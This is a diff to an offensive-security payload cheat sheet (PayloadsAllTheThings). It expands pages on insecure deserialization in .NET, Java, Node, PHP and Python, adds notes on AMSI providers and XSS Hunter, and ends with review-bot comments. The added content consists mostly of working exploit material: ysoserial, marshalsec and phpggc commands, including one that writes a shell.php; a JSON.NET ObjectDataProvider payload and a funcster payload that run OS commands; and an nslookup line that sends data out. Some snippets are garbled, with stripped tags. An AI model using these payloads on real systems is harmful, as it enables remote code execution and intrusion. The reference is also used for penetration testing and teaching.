diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md index 976a9f4..0fef027 100644 --- a/Insecure Deserialization/DotNET.md +++ b/Insecure Deserialization/DotNET.md @@ -3,7 +3,13 @@ ## Summary * [Detection](#detection) -* [Exploit](#exploit) +* [Tools](#tools) +* [Formatters](#formatters) + * [XmlSerializer](#) + * [DataContractSerializer](#) + * [JSON.NET](#) + * [BinaryFormatter](#) +* [POP Gadgets](#pop-gadgets) * [References](#references) @@ -15,7 +21,7 @@ Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=` -## Exploit +## Tools * [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net) ```ps1 
@@ -25,24 +31,120 @@ $ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t ``` -### JSON.NET +## Formatters + +![NETNativeFormatters.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Insecure%20Deserialization/Images/NETNativeFormatters.png?raw=true) +.NET Native Formatters from [pwntester/attacking-net-serialization](https://speakerdeck.com/pwntester/attacking-net-serialization?slide=15) + +### XmlSerializer + +* In C# source code, look for `XmlSerializer(typeof());`. +* The attacker must control the **type** of the XmlSerializer. +* Payload output: **XML** + +```xml +.\ysoserial.exe -g ObjectDataProvider -f XmlSerializer -c "calc.exe" + + + + + + Parse + + + cmd/c calc.exe]]> + + + + + + +``` + + +### DataContractSerializer + +> The DataContractSerializer deserializes in a loosely coupled way. It never reads common language runtime (CLR) type and assembly names from the incoming data. The security model for the XmlSerializer is similar to that of the DataContractSerializer, and differs mostly in details. For example, the XmlIncludeAttribute attribute is used for type inclusion instead of the KnownTypeAttribute attribute. + +* In C# source code, look for `DataContractSerializer(typeof())`. +* Payload output: **XML** +* Data **Type** must be user-controlled to be exploitable + + +### NetDataContractSerializer + +* In C# source code, look for `NetDataContractSerializer().ReadObject()`. 
+* Payload output: **XML** ```ps1 -./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t +.\ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "calc.exe" -o base64 -t +``` + + +### JSON.NET + +* Payload output: **JSON** + +```ps1 +.\ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc.exe" -t +{ + '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', + 'MethodName':'Start', + 'MethodParameters':{ + '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', + '$values':['cmd', '/c calc.exe'] + }, + 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} +} ``` ### BinaryFormatter -> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they’re processing to be trustworthy. BinaryFormatter is insecure and can’t be made secure. +> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. BinaryFormatter is insecure and can’t be made secure. + +* In C# source code, look for `System.Runtime.Serialization.Binary.BinaryFormatter`. +* Exploitation requires `[Serializable]` or `ISerializable` interface. 
+* Payload output: **Binary** ```ps1 -./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t +./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t ``` +## POP Gadgets + +These gadgets must have the following properties: +* Serializable +* Public/settable variables +* Magic "functions": Get/Set, OnSerialisation, Constructors/Destructors + +You must carefully select your **gadgets** for a targeted **formatter**. + + +List of popular gadgets used in common payloads. +* **ObjectDataProvider** from `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll` + * Use `MethodParameters` to set arbitrary parameters + * Use `MethodName` to call an arbitrary function +* **ExpandedWrapper** + * Specify the `object types` of the objects that are encapsulated + ```cs + ExpandedWrapper myExpWrap = new ExpandedWrapper(); + ``` + + ## References -* [Attacking .NET deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q) +* [Attacking .NET Serialization - Alvaro - October 20, 2017](https://speakerdeck.com/pwntester/attacking-net-serialization?slide=11) +* [Attacking .NET Deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q) +* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - Slides](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) +* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - White Paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf) +* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - DEF CON 25 Conference](https://www.youtube.com/watch?v=ZBfBYoK_Wr0) +* [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - James Forshaw - Slides](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_Slides.pdf) +* [ARE YOU MY TYPE? 
Breaking .NET sandboxes through Serialization - James Forshaw - White Paper](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf) * [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - ALYSSA RAHMANDEC](https://www.mandiant.com/resources/blog/hunting-deserialization-exploits) -* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) \ No newline at end of file +* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) +* [Bypassing .NET Serialization Binders - Markus Wulftange - June 28, 2022](https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html) +* [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net) - hacktricks](https://book.hacktricks.xyz/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net) +* [Sitecore Experience Platform Pre-Auth RCE - CVE-2021-42237 - Nov 2, 2021 - Shubham Shah](https://blog.assetnote.io/2021/11/02/sitecore-rce/) +* [Finding a New DataContractSerializer RCE Gadget Chain - November 7, 2019 - dugisec](https://muffsec.com/blog/finding-a-new-datacontractserializer-rce-gadget-chain/) \ No newline at end of file diff --git a/Insecure Deserialization/Images/NETNativeFormatters.png b/Insecure Deserialization/Images/NETNativeFormatters.png new file mode 100755 index 0000000..ed5a5c2 Binary files /dev/null and b/Insecure Deserialization/Images/NETNativeFormatters.png differ diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md index a40b19a..c13b999 100644 --- a/Insecure Deserialization/Java.md +++ b/Insecure Deserialization/Java.md 
@@ -9,17 +9,20 @@ - Content-type = "application/x-java-serialized-object" - `"H4sIAAAAAAAAAJ"` in gzip(base64) -## Exploit +## Tools + +### Ysoserial [frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. ```java java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin -java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin +java -jar ysoserial.jar Groovy1 'ping 127.0.0.1' > payload.bin java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 ``` +**List of payloads included in ysoserial:** ```ps1 Payload Authors Dependencies ------- ------- ------------ @@ -59,7 +62,7 @@ Vaadin1 @kai_ullrich vaadin-server:7.7.14, Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4 ``` -## Burp extensions using ysoserial +### Burp extensions using ysoserial - [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller) - [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner) 
@@ -67,24 +70,26 @@ Wicket1 @jacob-baines wicket-util:6.23.0, s - [SuperSerial](https://github.com/DirectDefense/SuperSerial) - [SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active) -## Other tools +### Alternative Tooling -- [JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget) -- [JexBoss](https://github.com/joaomatosf/jexboss) - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool -- [ysoserial-modified](https://github.com/pimps/ysoserial-modified) -- [gadgetprobe](https://labs.bishopfox.com/gadgetprobe) -- [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution +- [pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget) +- [joaomatosf/JexBoss](https://github.com/joaomatosf/jexboss) - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool +- [pimps/ysoserial-modified](https://github.com/pimps/ysoserial-modified) +- [NickstaDB/SerialBrute](https://github.com/NickstaDB/SerialBrute) - Java serialization brute force attack tool +- [NickstaDB/SerializationDumper](https://github.com/NickstaDB/SerializationDumper) - A tool to dump Java serialization streams in a more human readable form +- [bishopfox/gadgetprobe](https://labs.bishopfox.com/gadgetprobe) +- [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution ```java -$ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ []] -$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389 +$ java -cp marshalsec.jar marshalsec. 
[-a] [-v] [-t] [ []] +$ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc" +$ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389 - where - -a - generates/tests all payloads for that marshaller - -t - runs in test mode, unmarshalling the generated payloads after generating them. - -v - verbose mode, e.g. also shows the generated payload in test mode. - gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller. - arguments - Gadget specific arguments +-a - generates/tests all payloads for that marshaller +-t - runs in test mode, unmarshalling the generated payloads after generating them. +-v - verbose mode, e.g. also shows the generated payload in test mode. +gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller. +arguments - Gadget specific arguments ``` Payload generators for the following marshallers are included:
@@ -105,6 +110,13 @@ Payload generators for the following marshallers are included:
| XStream | **JDK only RCEs** | YAMLBeans | third party RCE +## Gadgets + +Require: +* `java.io.Serializable` + + + ## References diff --git a/Insecure Deserialization/Node.md b/Insecure Deserialization/Node.md index b25f3b7..2f92304 100644 --- a/Insecure Deserialization/Node.md +++ b/Insecure Deserialization/Node.md @@ -3,10 +3,19 @@ ## Summary * [Exploit](#exploit) + * [node-serialize](#node-serialize) + * [funcster](#funcster) * [References](#references) ## Exploit +* In Node source code, look for: + * `node-serialize` + * `serialize-to-js` + * `funcster` + +### node-serialize + > An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE). 1. Generate a serialized payload @@ -26,6 +35,12 @@ ``` 3. Send the payload +### funcster + +```js +{"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}} +``` + ## References diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md index e30689a..30522be 100644 --- a/Insecure Deserialization/PHP.md +++ b/Insecure Deserialization/PHP.md @@ -15,8 +15,8 @@ Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.c * [General concept](#general-concept) * [Authentication bypass](#authentication-bypass) * [Finding and using gadgets](#finding-and-using-gadgets) -* [Real world examples](#real-world-examples) * [PHP Phar Deserialization](#php-phar-deserialization) +* [Real world examples](#real-world-examples) * [References](#references) ## General concept 
@@ -111,7 +111,7 @@ Payload: O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} ``` -We can do an array to like this: +We can do an array like this: ```php a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;} @@ -121,7 +121,14 @@ a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;} Also called `"PHP POP Chains"`, they can be used to gain RCE on the system. -[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: +* In PHP source code, look for `unserialize()` function. +* Interesting [Magic Methods](https://www.php.net/manual/en/language.oop5.magic.php) such as `__construct()`, `__destruct()`, `__call()`, `__callStatic()`, `__get()`, `__set()`, `__isset()`, `__unset()`, `__sleep()`, `__wakeup()`, `__serialize()`, `__unserialize()`, `__toString()`, `__invoke()`, `__set_state()`, `__clone()`, and `__debugInfo()`: + * `__construct()`: PHP class constructor, is automatically called upon object creation + * `__destruct()`: PHP class destructor, is automatically called when references to the object are removed from memory + * `__toString()`: PHP call-back that gets executed if the object is treated like a string + * `__wakeup()` PHP call-back that gets executed upon deserialization + +[ambionics/phpggc](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: - Laravel - Symfony @@ -133,6 +140,8 @@ Also called `"PHP POP Chains"`, they can be used to gain RCE on the system. ```powershell phpggc monolog/rce1 'phpinfo();' -s +phpggc monolog/rce1 assert 'phpinfo()' +phpggc swiftmailer/fw1 /var/www/html/shell.php /tmp/data phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini ``` diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index 563db1c..656def5 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md 
@@ -1,5 +1,11 @@ # Python Deserialization +* In Python source code, look for: + * `cPickle.loads` + * `pickle.loads` + * `_pickle.loads` + * `jsonpickle.decode` + ## Pickle The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index 23b8391..1e5cc2a 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -18,10 +18,20 @@ Check the following sub-sections, located in other files : | Python Pickle | 80 04 95 | gASV | | PHP Serialized | 4F 3A | Tz | +## POP Gadgets -## LABS +> A POP (Property Oriented Programming) gadget is a piece of code implemented by an application's class, that can be called during the deserialization process. -* [Insecure Deserialization 10 labs](https://portswigger.net/web-security/all-labs#insecure-deserialization) +POP gadgets characteristics: +* Can be serialized +* Has public/accessible properties +* Implements specific vulnerable methods +* Has access to other "callable" classes + +## Labs + +* [Portswigger - Insecure Deserialization](https://portswigger.net/web-security/all-labs#insecure-deserialization) +* [NickstaDB/DeserLab - Java deserialization exploitation lab](https://github.com/NickstaDB/DeserLab) ## References diff --git a/Methodology and Resources/Windows - AMSI Bypass.md b/Methodology and Resources/Windows - AMSI Bypass.md index 813206c..40573d3 100644 --- a/Methodology and Resources/Windows - AMSI Bypass.md +++ b/Methodology and Resources/Windows - AMSI Bypass.md @@ -2,6 +2,7 @@ ## Summary +* [List AMSI Providers](#list-amsi-providers) * [Which Endpoint Protection is Using AMSI](#which-endpoint-protection-is-using-amsi) * [Patching amsi.dll AmsiScanBuffer by rasta-mouse](#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse) * [Dont use net webclient](#Dont-use-net-webclient) 
@@ -19,9 +20,31 @@ * [Adam Chesters Patch](#Adam-Chester-Patch) * [AMSI.fail](#amsifail) +## List AMSI Providers + +* List providers with : `Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\'` +* Find software from CLSID + ```ps1 + Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}' + Name Property + ---- -------- + Hosts (default) : Scanned Hosting Applications + InprocServer32 (default) : "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpOav.dll" + ``` + ## Which Endpoint Protection is Using AMSI -* https://github.com/subat0mik/whoamsi/wiki/Which-Endpoint-Protection-is-Using-AMSI%3F +Small extract from [subat0mik/whoamsi](https://github.com/subat0mik/whoamsi) - An effort to track security vendors' use of Microsoft's Antimalware Scan Interface: + +| Vendor/Product | AMSI | Date | Reference | +| -------- | -------- | -------- | -------- | +| Avast | Y | 03/20/2016 | https://forum.avast.com/index.php?topic=184491.msg1300884#msg1300884 | +| AVG | Y | 03/08/2016 | https://support.avg.com/answers?id=906b00000008oUTAAY | +| BitDefender Consumer | Y | 09/20/2016 | https://forum.bitdefender.com/index.php?/topic/72455-antimalware-scan-service/ | +| BitDefender Enterprise | Y | 05/25/2021 | https://twitter.com/Bitdefender_Ent/status/1397187195669295111?s=20 | +| Kaspersky Anti Targeted Attack Platform | Y | 10/10/2018 | https://help.kaspersky.com/KIS/2019/en-US/119653.htm | +| Symantec Advanced Threat Protection | Y | 07/15/2020 | https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/symantec-security-software/endpoint-security-and-management/endpoint-protection/all/release-notes/Whats-new-for-Symantec-Endpoint-Protection-14_3-.html | +| Microsoft Defender for Endpoint | Y | 06/09/2015 | https://www.microsoft.com/security/blog/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/ # Patching amsi.dll AmsiScanBuffer by rasta-mouse 
diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 7b788a1..da1e166 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -497,7 +497,7 @@ document.getElementById('btn').onclick = function(e){ ### XSS Hunter -Available at [https://xsshunter.com/app](https://xsshunter.com/app) +XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). You can set up an alternative version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express) > XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
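Review bot: the four new Summary sub-entries in `Insecure Deserialization/DotNET.md` (`[XmlSerializer](#)`, `[DataContractSerializer](#)`, `[JSON.NET](#)`, `[BinaryFormatter](#)`) all link to a bare `#`, so they navigate nowhere; point them at the heading anchors (`#xmlserializer`, `#datacontractserializer`, `#jsonnet`, `#binaryformatter`) and add an entry for the `NetDataContractSerializer` section that is introduced further down but missing from this list.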
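Review bot: the BinaryFormatter bullet in the Formatters hunk of `DotNET.md` tells readers to grep for `System.Runtime.Serialization.Binary.BinaryFormatter`, but the type lives in `System.Runtime.Serialization.Formatters.Binary`, so a search for the name as written finds nothing; fix the namespace. In the same hunk the XmlSerializer block is fenced as `xml` yet starts with the `.\ysoserial.exe` command line, and the payload body has lost its element tags (lines like `Parse` and `cmd/c calc.exe]]>` stand alone), so it is neither valid XML nor the generator's actual output: move the command into its own `ps1` fence and paste the output verbatim. The DataContractSerializer blockquote has no source link, unlike the other quoted material; cite where it comes from. Under POP Gadgets, `ExpandedWrapper myExpWrap = new ExpandedWrapper();` omits the generic type arguments that the bullet above it says must be specified (they look like they were stripped as angle brackets), so the snippet does not compile as shown; restore them. "Magic functions: Get/Set, OnSerialisation" is vague for .NET: name the actual hooks (property getters/setters, the `[OnDeserialized]`/`[OnDeserializing]` callbacks, constructors and finalizers). Finally, the References entries are inconsistent: "Attacking .NET Serialization - Alvaro - October 20, 2017" uses a first name only while the next line gives "Alvaro Muñoz", and "28 avr. 2018" is a French month abbreviation in an English list.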
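Review bot: in the first `Java.md` hunk the new line `**List of payloads included in ysoserial:**` is immediately followed by the opening fence with no blank line, which some Markdown renderers will fold into the paragraph; add a blank line. The fence labels in this region are also misleading: the `java -jar ysoserial.jar ...` commands are shell invocations fenced as `java`, and the payload table is fenced as `ps1`; `bash`/`text` would be accurate.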
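Review bot: the rewritten marshalsec usage line in the Alternative Tooling hunk of `Java.md` reads `$ java -cp marshalsec.jar marshalsec. [-a] [-v] [-t] [ []]`, so the marshaller, gadget_type and arguments placeholders that the option list below refers to are missing (they appear to have been stripped as angle-bracket tags); spell them out so `gadget_type` and `arguments` in the explanation correspond to something on the usage line. The two concrete examples on the following lines (`marshalsec.JsonIO ...` and `marshalsec.jndi.LDAPRefServer ...`) would read better after the option list rather than interleaved with the usage synopsis.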
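Review bot: the new `## Gadgets` section in `Java.md` is a stub: it contains only `Require:` and a single bullet, `java.io.Serializable`, followed by blank lines. Either complete it along the lines of the DotNET.md and README.md POP Gadgets sections (what makes a class usable as a gadget and which callbacks, such as `readObject`, run during deserialization) or drop it from this change and add it when there is content.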
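Review bot: the Summary hunk of `Node.md` adds `serialize-to-js` to the "look for" list but there is no corresponding section or Summary entry for it, while `node-serialize` and `funcster` get both; either add a short `### serialize-to-js` section or say in the bullet that its unserialize behaviour mirrors node-serialize.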
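Review bot: the `### funcster` block in `Node.md` is a bare payload with no explanation of the sink, so a reader does not learn why it works or what to look for in code: add one sentence stating that funcster's deserializer rebuilds any value carrying a `__js_function` key into a live function, which is why the key is the thing to search for. The fence is labelled `js` but the content is a JSON document; use `json`. The payload also hardcodes a Windows command (`cmd /c calc`), which should be noted so readers do not assume it is portable.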
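Review bot: in the magic-methods hunk of `PHP.md` the `__wakeup()` bullet is missing the colon the other bullets use, and `__unserialize()`, which is listed in the intro sentence and is the PHP 7.4+ counterpart to `__wakeup()`, gets no description while the less relevant `__toString()` does; add a line for it. Minor grammar in the same hunk: "look for `unserialize()` function" should be "look for the `unserialize()` function", and "`__construct()`: PHP class constructor, is automatically called" reads better as "PHP class constructor, automatically called".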
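Review bot: the new "look for" list in `Python.md` only names the `.loads` string variants (`cPickle.loads`, `pickle.loads`, `_pickle.loads`); the file-based `pickle.load` and direct use of `pickle.Unpickler` are the same sink and are easy to miss with that grep list, so add them.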
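Review bot: the POP gadget characteristics introduced in `README.md` ("Can be serialized", "Has public/accessible properties", "Implements specific vulnerable methods", "Has access to other callable classes") overlap with the list added to `DotNET.md` in the same change ("Serializable", "Public/settable variables", "Magic functions"), using different wording for the same properties; keep the general definition in README.md and have the DotNET.md section refer to it, or at least align the terms so readers do not think they are different criteria.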
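Review bot: the last row of the new AMSI vendor table in `Windows - AMSI Bypass.md` (`| Microsoft Defender for Endpoint | Y | 06/09/2015 | https://... `) has no closing `|` and is followed directly by the `# Patching amsi.dll AmsiScanBuffer by rasta-mouse` heading with no blank line, so the heading will be swallowed into the table cell in most renderers. In the List AMSI Providers section, the CLSID in the example (`{2781761E-28E0-4109-99FE-B9D127C57AFE}`) and the `Platform\4.18.2210.4-0\MpOav.dll` path are specific to one Defender install; say that the CLSID comes from the output of the first `Get-ChildItem` command and that the platform version directory will differ between hosts.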
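Review bot: the rewritten XSS Hunter line in `XSS Injection/README.md` is a comma splice ("XSS Hunter is deprecated, it was available at ..."), and the blockquote that follows still describes the hosted service in the present tense ("The service works by hosting ..."); split the sentence ("XSS Hunter is deprecated; it was available at ... . A self-hostable version is maintained at mandatoryprogrammer/xsshunter-express.") and either mark the quote as describing the original service or move it under the self-hosted link.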